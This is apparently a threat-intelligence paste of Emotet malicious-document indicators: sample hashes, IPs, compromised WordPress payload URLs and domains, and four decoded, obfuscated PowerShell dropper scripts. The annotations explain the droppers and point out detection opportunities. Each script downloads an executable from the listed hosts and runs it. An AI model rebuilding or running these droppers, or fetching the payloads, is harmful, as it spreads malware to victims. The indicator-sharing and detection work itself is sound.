Emotet_Doc_out_2020-09-17_23_27.txt

Sep 17th, 2020
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256 (hashes of the malicious document samples; three entries are listed twice — 9ca360d9…, 03de8778… and 754c1c61… — so dedupe before loading into a blocklist, which leaves 41 unique hashes):
  4. d3a0d1bebe19f71b0659a0b872335d15b031adb5fb6b2d554d21b4ffa2566f84
  5. abd391ba30ec357118a07d13079a0259e02352cd1d0926ea893e75dcee25b9e8
  6. 33c142bebe8fd0e786a5db3cc089405aa699779e88f811c212cec330927fbaa5
  7. b2ef51510cebb41a3b19daa87fbc45731b67810e6fc8af03dd6353778a0a3694
  8. 22823faf02dacc31bab524d0ff73e36775b3f629be5a241f9334b6f094220b0e
  9. c6dcfa2a31a094225c25a0d53cccd915b76ab34be20b10fc775d740b3e6d9b21
  10. 4d2275748dd3705817affba2d9a9a1eda99c5c8c05e97243b48d537c0de0bc9f
  11. bb2f1cf59cc83ef51ee2226d600d769353c4cc78b6a2b4774169a012d0bad537
  12. 1da1190d2c7472ff429ae35611b7120698dca55175d1c298e68f24f33fc4caec
  13. 42f8349a51f2a89dc0e94db8a5437d9a51a817b6a12f77178b9beed274730b5d
  14. 3c4a0821165875c1b49f72ae9ff7181a0867bdcf2a2c8496f7487263817e3012
  15. 6274d6fc5f58fb23f021e998ce3ba08addb461bc1403267302e7e7a2abc376d4
  16. 9de91f69583b1765c182e6952a78af003dd26df75c249ca6c8091fa96fbc5fed
  17. 01212645a670921f26fbdad447c6e1f5f245f58e951a5c781ffdfe2188c41dca
  18. b793dfcf204566b8cfc24272c1cb1b773a0b718ac3fa0c97b6865e6ed934232a
  19. c0b0190e9c0f54631ef80450c23e834d03dc3c1a7f09b6628a90cfd23863d7a1
  20. 325a380ed57f51ecc25ea1686443642213bd9c8f9e00eaa57a4aa2933b920987
  21. 9ca360d9bc6ec7fe3eb945228ae73b2b92f7ec09cf4593576c11617fa8896e7f
  22. 9ca360d9bc6ec7fe3eb945228ae73b2b92f7ec09cf4593576c11617fa8896e7f
  23. 03de8778d73e8753ae7006da7b533c87ac0ee1c1552d06188e045d5d578782a7
  24. 03de8778d73e8753ae7006da7b533c87ac0ee1c1552d06188e045d5d578782a7
  25. 71c10ef5826e77ea309069352d06d519e2707c5ed34f2f7169788a58e512b032
  26. 6b876e7e2ab51b43855fc6f61be843893b4f75176e3ba28160330afeb9eb51e0
  27. 266182936e91bf387900a37c29c044541d8646676cd85790aa27214e6f210848
  28. 54e22118b677aadbd92103152e9eb98f6a37c701dba7fcc87067d84e124d0ba9
  29. 498204b7179b4e744a2c48a9c98bf0db418964e72d579a677e818ce06a7410cf
  30. 1ee37e9d15c8e0ddf602115c14744881a35377665b3ebeb7d07b8fc212df29e3
  31. cc63dfcd6635c5015409c3a12a978b586bf9c3ae9c8c9ed0af8dca8c7384350a
  32. ec8a629ad4eba60b9aef40fbac29aa11e1ca1ed58392d46d3ea51f7b96e2c218
  33. 754c1c6182cf24004ca005e843e007cff4a65d1a82f13da77528c05c8512c458
  34. 754c1c6182cf24004ca005e843e007cff4a65d1a82f13da77528c05c8512c458
  35. b99a784e8e870636fa298de56b04b6b1768c85f52bf6a93574728c3bd2e9cc52
  36. b3240fbb14733b9f558fe30cb147d6e9c00992afa71b7dbe652f5fb9174b55c0
  37. 4c7d03529b2c68ff7e5fd215ff3784d5040c9a9020eb213029cdc0c7dd4ea574
  38. 30fae41cd15ad7341c7e91b9e003b523538a2b23f9afa8d601ec22cdb738526b
  39. f3b8ff61ea17946cef98f45d9cc0d8a2040fd8786b423f4263667aa81730e644
  40. a129e73cc919daf062ce54cb87e34867a4d9578eb4f5698fd07bedd89702da9f
  41. d3328d7a586ab8323126ba843927a8a7ea4584f6546dbd143cd42589cefdd2e4
  42. b0a9ce0b9fd719fe2a359bd524f9555231f7e32201f9e49e0a681661b3792ee0
  43. 19fe4c6dc5c3dfc4d63af00a128954037ecc24924352a669df25ce2a8eda95bd
  44. 0bbcf36fb9468cf4e66bdb897dddc8f7b9533bebe58a5dd188e398415630c468
  45. 9377f00f0c506d7b1d51679767340ba4632827a2ba7e8450aa85a048c669dd49
  46. f2e89a59e17bd990aa45be742ce8a121a9ef6ddd0346d7daa6a815897bb60172
  47. 3aa4f27101991883f1d5ff18ca7f7188bb0f473eaf17b1525c590b5c0296a2b7
  48.  
  49.  
  50. IPs (presumably the addresses the URL hosts resolved to at collection time; several sit on shared infrastructure — 52.56.233.157 is the EC2 instance named in the URL list, and 104.18.40.177, 104.18.41.177 and 172.67.179.144 appear to be CDN proxy addresses — so verify ownership before blocking at the network edge, or legitimate tenants behind the same addresses will be blocked too):
  51. 103.69.130.57
  52. 104.18.40.177
  53. 104.18.41.177
  54. 108.61.200.174
  55. 143.208.8.40
  56. 156.247.12.228
  57. 157.245.235.93
  58. 162.241.148.13
  59. 171.22.26.120
  60. 172.67.179.144
  61. 192.163.232.182
  62. 198.91.85.131
  63. 205.144.171.34
  64. 209.59.142.44
  65. 216.194.172.150
  66. 23.224.135.235
  67. 45.32.172.210
  68. 52.56.233.157
  69. 74.208.236.208
  70. 78.31.106.99
  71. 91.216.107.195
  72. 91.238.160.172
  73. 95.130.52.237
  74.  
  75.  
  76.  
  77. URLs (payload download locations; the first seven are listed twice because the first two decoded scripts carry the same list. The trailing ."SpL`it"[char]42 fragments are left over from the PowerShell that splits a "*"-delimited string into the URL array — they are not part of the URL. The wp-content/wp-admin/wp-includes paths suggest compromised WordPress sites rather than attacker-owned domains, so prefer URL-level blocking and expect the payload at these paths to rotate):
  78. hxxp://veccino56.com/gjpra/4ZR/
  79. hxxp://girlgeekdinners.com/wp-content/Hpz/
  80. hxxp://marblingmagpie.com/COPYRIGHT/Ak/
  81. hxxp://aplicativoipok.net/wp-includes/ONW/
  82. hxxp://ec2-52-56-233-157.eu-west-2.compute.amazonaws.com/wp-includes/35/
  83. hxxps://shd7.life/mlktv/r6/
  84. hxxps://www.hairlineunisexsalon.com/demo/UX/."SpL`it"[char]42;
  85. hxxp://veccino56.com/gjpra/4ZR/
  86. hxxp://girlgeekdinners.com/wp-content/Hpz/
  87. hxxp://marblingmagpie.com/COPYRIGHT/Ak/
  88. hxxp://aplicativoipok.net/wp-includes/ONW/
  89. hxxp://ec2-52-56-233-157.eu-west-2.compute.amazonaws.com/wp-includes/35/
  90. hxxps://shd7.life/mlktv/r6/
  91. hxxps://www.hairlineunisexsalon.com/demo/UX/."SpL`It"[char]42;
  92. hxxp://rhyton-building.com/wp-admin/Ey8qV0/
  93. hxxp://ezzll.com/wp-includes/KIU2WU/
  94. hxxp://tellmetech.com/wp-content/4ka/
  95. hxxps://elmundodelareposteria.com/wp-admin/0PVVmJm/
  96. hxxps://manuelrozas.cl/assets/XWN/
  97. hxxps://haritdharni.com/wp-admin/bZM/
  98. hxxps://theworks-group.com/site/pQT6j5/."SP`Lit"[char]42;
  99. hxxp://zcomunicacion.com/wp-admin/Z/
  100. hxxp://cooldoggraphics.com/wp-content/Pge/
  101. hxxp://canyonplastering.com/wp-content/ZWX/
  102. hxxps://stochile.com/sto/PKP/
  103. hxxp://voxdream.com/wp-includes/rd/
  104. hxxps://www.valetourvirtual.com/vapor/mp/
  105. hxxp://z.89fk.top/user/e/."SP`LIT"[char]42;
  106.  
  107.  
  108. Domains (hostnames extracted from the URLs above; the first seven repeat. Two carry a www. prefix, so match on the registered domain and its subdomains rather than on the exact string. The ec2-…compute.amazonaws.com entry is an EC2 instance hostname — block that full hostname, not amazonaws.com):
  109. veccino56.com
  110. girlgeekdinners.com
  111. marblingmagpie.com
  112. aplicativoipok.net
  113. ec2-52-56-233-157.eu-west-2.compute.amazonaws.com
  114. shd7.life
  115. www.hairlineunisexsalon.com
  116. veccino56.com
  117. girlgeekdinners.com
  118. marblingmagpie.com
  119. aplicativoipok.net
  120. ec2-52-56-233-157.eu-west-2.compute.amazonaws.com
  121. shd7.life
  122. www.hairlineunisexsalon.com
  123. rhyton-building.com
  124. ezzll.com
  125. tellmetech.com
  126. elmundodelareposteria.com
  127. manuelrozas.cl
  128. haritdharni.com
  129. theworks-group.com
  130. zcomunicacion.com
  131. cooldoggraphics.com
  132. canyonplastering.com
  133. stochile.com
  134. voxdream.com
  135. www.valetourvirtual.com
  136. z.89fk.top
  137.  
  138.  
  139. Decoded Base64 PowerShell (four dropper scripts, separated by the ����^� decoding artifacts; quote characters were lost in rendering, so the text is not directly runnable — and must not be run. Each script does the same thing: creates a two-level random-named directory under %USERPROFILE%; sets the backtick-obfuscated [Net.ServicePointManager]::SecurityProtocol to tls12, tls11, tls; builds the drop path by replacing a placeholder token with [char]92 (backslash), ending in <random>.exe; splits the "*"-delimited URL string with the obfuscated "Split" method; then loops over the URLs calling WebClient.DownloadFile inside try/catch, and if the downloaded file's Length is at least the hard-coded threshold (38437, 39062, 28279 or 27829 bytes respectively) launches it with Invoke-Item and breaks out of the loop. The many single-use assignments like $Oyek_ej=Kw1ghpa appear to be filler. Detection opportunities visible here: DownloadFile followed by Invoke-Item on a fresh .exe under %USERPROFILE%, new-item directory creation in the same path, and backtick-split member names in the command line — PowerShell launched from the document's host process is the likely parent, given the maldoc context, but that is not shown in this paste):
  140. ����^�$K_78kds=Wlesjgp;
  141. &new-item $Env:UsErprOfIlE\CKzTkyH\zbI1LVz\ -itemtype dIREctorY;
  142. [Net.ServicePointManager]::"SecU`RityPr`OtoC`Ol" = tls12, tls11, tls;
  143. $Vgpa1ce = X_4ztcqx;
  144. $Oyek_ej=Kw1ghpa;
  145. $H0exgs1=$env:userprofileoD9CkztkyhoD9Zbi1lvzoD9 -CrePlAcE oD9,[CHaR]92$Vgpa1ce.exe;
  146. $Ty0u1l4=P5m4_sm;
  147. $F_1g7o1=.new-object NeT.wEBCLienT;
  148. $Kv20yyh=hxxp://veccino56.com/gjpra/4ZR/
  149. hxxp://girlgeekdinners.com/wp-content/Hpz/
  150. hxxp://marblingmagpie.com/COPYRIGHT/Ak/
  151. hxxp://aplicativoipok.net/wp-includes/ONW/
  152. hxxp://ec2-52-56-233-157.eu-west-2.compute.amazonaws.com/wp-includes/35/
  153. hxxps://shd7.life/mlktv/r6/
  154. hxxps://www.hairlineunisexsalon.com/demo/UX/."SpL`it"[char]42;
  155. $Gg2pox8=Wa5v1qz;
  156. foreach$Raz70hv in $Kv20yyh{try{$F_1g7o1."DownLO`A`D`FILe"$Raz70hv, $H0exgs1;
  157. $U82osdb=Wrzf3rs;
  158. If .Get-Item $H0exgs1."LeN`gtH" -ge 38437 {.Invoke-Item$H0exgs1;
  159. $E8bzvoe=Ty1ri9f;
  160. break;
  161. $U_c29bg=Mu803qo}}catch{}}$Xlttx6h=Qy2pl3x����^�$T8xunu2=Fvflby7;
  162. .new-item $eNv:USerprofIle\LWfrhxU\NLFkW63\ -itemtype dIReCtORY;
  163. [Net.ServicePointManager]::"seCurit`YP`RO`To`COl" = tls12, tls11, tls;
  164. $Qiso498 = Ukfj0bw;
  165. $Wprs460=M4y8lnd;
  166. $Pp8_50f=$env:userprofileSnHLwfrhxuSnHNlfkw63SnH-rEpLACESnH,[CHaR]92$Qiso498.exe;
  167. $W4jwsiq=L5smzt2;
  168. $Vjzh0kt=&new-object net.WebCLIENt;
  169. $Hmf4utb=hxxp://veccino56.com/gjpra/4ZR/
  170. hxxp://girlgeekdinners.com/wp-content/Hpz/
  171. hxxp://marblingmagpie.com/COPYRIGHT/Ak/
  172. hxxp://aplicativoipok.net/wp-includes/ONW/
  173. hxxp://ec2-52-56-233-157.eu-west-2.compute.amazonaws.com/wp-includes/35/
  174. hxxps://shd7.life/mlktv/r6/
  175. hxxps://www.hairlineunisexsalon.com/demo/UX/."SpL`It"[char]42;
  176. $Hzz0cit=Pn6ja0b;
  177. foreach$Gz2v6dt in $Hmf4utb{try{$Vjzh0kt."dOW`NLoa`dfi`le"$Gz2v6dt, $Pp8_50f;
  178. $Ejof3_q=Zwc_mxd;
  179. If &Get-Item $Pp8_50f."leN`G`Th" -ge 39062 {&Invoke-Item$Pp8_50f;
  180. $Zwwyf5x=Xafoh5s;
  181. break;
  182. $Cfqew8l=B_rgta0}}catch{}}$Xhbnp2a=T760li3����^�$Uhxq4lu=Csdink0;
  183. &new-item $enV:USeRpROfILE\uofWsUv\lnxYN6_\ -itemtype DireCToRY;
  184. [Net.ServicePointManager]::"S`E`C`UrITypr`oTOcOl" = tls12, tls11, tls;
  185. $Fzgau0e = Mjlzifmu;
  186. $C4i9x5n=Rhmmzqs;
  187. $D89iwvk=$env:userprofilebCRUofwsuvbCRLnxyn6_bCR -cREplaCebCR,[chaR]92$Fzgau0e.exe;
  188. $Staqmrf=Agetkky;
  189. $Wub3m1t=&new-object Net.wEBCLienT;
  190. $Anzl9uk=hxxp://rhyton-building.com/wp-admin/Ey8qV0/
  191. hxxp://ezzll.com/wp-includes/KIU2WU/
  192. hxxp://tellmetech.com/wp-content/4ka/
  193. hxxps://elmundodelareposteria.com/wp-admin/0PVVmJm/
  194. hxxps://manuelrozas.cl/assets/XWN/
  195. hxxps://haritdharni.com/wp-admin/bZM/
  196. hxxps://theworks-group.com/site/pQT6j5/."SP`Lit"[char]42;
  197. $Ce1slsq=Tuzcxl4;
  198. foreach$Pvsedn3 in $Anzl9uk{try{$Wub3m1t."dOWn`loA`D`FIlE"$Pvsedn3, $D89iwvk;
  199. $V7txmd_=Q59q16o;
  200. If .Get-Item $D89iwvk."L`enGTh" -ge 28279 {.Invoke-Item$D89iwvk;
  201. $Lju1_sh=I144d4z;
  202. break;
  203. $Hzp3au_=C7sua07}}catch{}}$Gsgcie6=Hv_og5t����^�$Xcqxdbk=Mvvi70d;
  204. .new-item $eNV:USerPROfilE\cwR0rzz\nKlX4mT\ -itemtype direCtORY;
  205. [Net.ServicePointManager]::"Secu`Ri`Ty`pRotoCOl" = tls12, tls11, tls;
  206. $Vkij83a = Jilfgk9;
  207. $Y3y1uln=Tnn6mn5;
  208. $Pybga60=$env:userprofile6eECwr0rzz6eENklx4mt6eE -crEpLacE [cHaR]54[cHaR]101[cHaR]69,[cHaR]92$Vkij83a.exe;
  209. $Ixs7erp=Eakvanz;
  210. $Neralei=.new-object Net.wEbclIent;
  211. $Sp2pteh=hxxp://zcomunicacion.com/wp-admin/Z/
  212. hxxp://cooldoggraphics.com/wp-content/Pge/
  213. hxxp://canyonplastering.com/wp-content/ZWX/
  214. hxxps://stochile.com/sto/PKP/
  215. hxxp://voxdream.com/wp-includes/rd/
  216. hxxps://www.valetourvirtual.com/vapor/mp/
  217. hxxp://z.89fk.top/user/e/."SP`LIT"[char]42;
  218. $Duzlouk=Gcrsvj9;
  219. foreach$Bnep3xi in $Sp2pteh{try{$Neralei."do`WNL`oADFilE"$Bnep3xi, $Pybga60;
  220. $Kj5u4c2=Jdttb4s;
  221. If &Get-Item $Pybga60."l`ENGth" -ge 27829 {.Invoke-Item$Pybga60;
  222. $Tz3zsy3=Ixc_8_9;
  223. break;
  224. $Hg2tf5d=F0lb2eq}}catch{}}$C66ugl8=Bhqpzsq